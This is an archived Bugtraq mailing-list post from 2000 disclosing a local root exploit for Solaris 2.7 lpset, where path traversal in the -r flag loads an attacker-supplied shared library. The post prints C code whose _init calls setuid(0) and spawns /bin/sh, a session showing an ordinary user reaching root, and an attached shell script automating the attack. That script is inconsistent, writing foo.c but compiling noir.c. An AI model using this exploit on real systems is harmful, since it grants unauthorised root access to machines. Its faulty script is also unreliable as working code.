[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Solaris/SPARC 2.7 lpset exploit (well not likely !)
From:       noir <noir () GSU ! LINUX ! ORG ! TR>
Date:       2000-04-27 11:33:05
[Download RAW message or body]

Hi,

lpset seems to use strcat() to pass the argument for -r flag
 ( /usr/lib/print/lib/../../../../tmp/foo) and appends .so to the end.
in this case /tmp/foo.so is going to be dlopen
but there is a special case /usr/lib/print/lib directory has to exist.
xploit shell script is attached.

$ uname -a
SunOS karate 5.7 Generic_106541-07 sun4u sparc SUNW,Ultra-5_10
$ id
uid=118(noir) gid=120(boha)
$ cd /tmp
$ cat > foo.c
#include <stdlib.h>
#include <unistd.h>
void
_init(void)
{
setuid(0);
system("/bin/sh");
}
^C$ /usr/local/bin/gcc -fPIC -c foo.c -g -DSOLARIS -Wall
$ ld -G -o foo.so foo.o -ldl
$ lpset -n xfn -r /../../../../tmp/foo foo
# id
uid=0(root) gid=120(boha)
#


Respect,
noir

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 5.0i for non-commercial use

mQENAzfpmZ4AAAEIALEp8z+/6SXHZ2IYf0PQnsyCm+9hfHxlQwWQs6BI5rBQdX9J
GuSqJfGX3w+fS9xl6MWRlvno3Nmnk66QhBgs8LnunmyhtFN03TBfq7mGoBYKb79R
4jX/kjGUg9oUCr+6sqwN3bXp812qKpScxKVMvMCtQissVzDLdA01U1wCFhMg7xBQ
N9lP8tJQ1gtKUnzdsnFgsLkgT3uN+Ek7bQdmwz9a1Xqcq2jxVj5j4yEErQoY3J8m
viV+u8mr/Wo0vWEGwIeCWOKNi6SXGz69Pd9a+JRjYIBnuu33o64aEYoMGbFdslNM
KbWxsXJJAwtw4/JqKt/LosYAFreteGhdA56c7JsABRG0IE5vaXIgU2luIDxub2ly
QGdzdS5saW51eC5vcmcudHI+iQEVAwUQN+mZnnhoXQOenOybAQG16Af8Dk4ZRciA
M1Fwq/fJOQJ/kcdszFHAEVHh1nToC99b+ZeoX2I3AIzrpYl0aGZBWQeGbtG4FZuz
ldWQcvT8jsQ1M1FraAZgKIzukxAxiOJL1twlQJyEDYQ3wwyWIXXqS3c1/jl7PgC1
iv7RQXxxLRn9qFPJQcaJavxRAAVytkDQWocTguRaehtdZsjxLmH2eE7cGQe0N9aL
JJfq0XLl1NjeV5pu5oTkc90/aJ/uHxPOStmPULm5WZP6nCTaQ28lPJBaDV8pLdPo
dSg+kvlvhi+k7UgAdvsETA/I6paFyOLq8lFdORA/GHof89NQX3OyJmDGTknfKtAf
9Ky2NbzA12r6zQ==
=o1d1
-----END PGP PUBLIC KEY BLOCK-----
["lpset.sh" (application/x-sh)]

#!/bin/sh
#
# /usr/bin/lpset vulnerability in Solaris/SPARC 2.7
# script by noir@gsu.linux.org.tr
#
# lpset seems to use strcat to append paths (-r)
# but there is a special case /usr/lib/print/lib has to be present
#

cat > foo.c << EOF
#include <stdlib.h>
#include <unistd.h>
void
_init(void)
{
	setuid(0);
	system("/bin/sh");
}
EOF

echo "Compiling ..."

gcc -fPIC -c noir.c -g -DSOLARIS -Wall
ld -G -o noir.so noir.o -ldl

chmod 755 noir.so

rm -f noir.c
rm -f noir.o

/usr/bin/lpset -n xfn -r /../../../..$PWD/noir noir






[prev in list] [next in list] [prev in thread] [next in thread]

Configure | About | News | Add a list | Sponsored by KoreLogic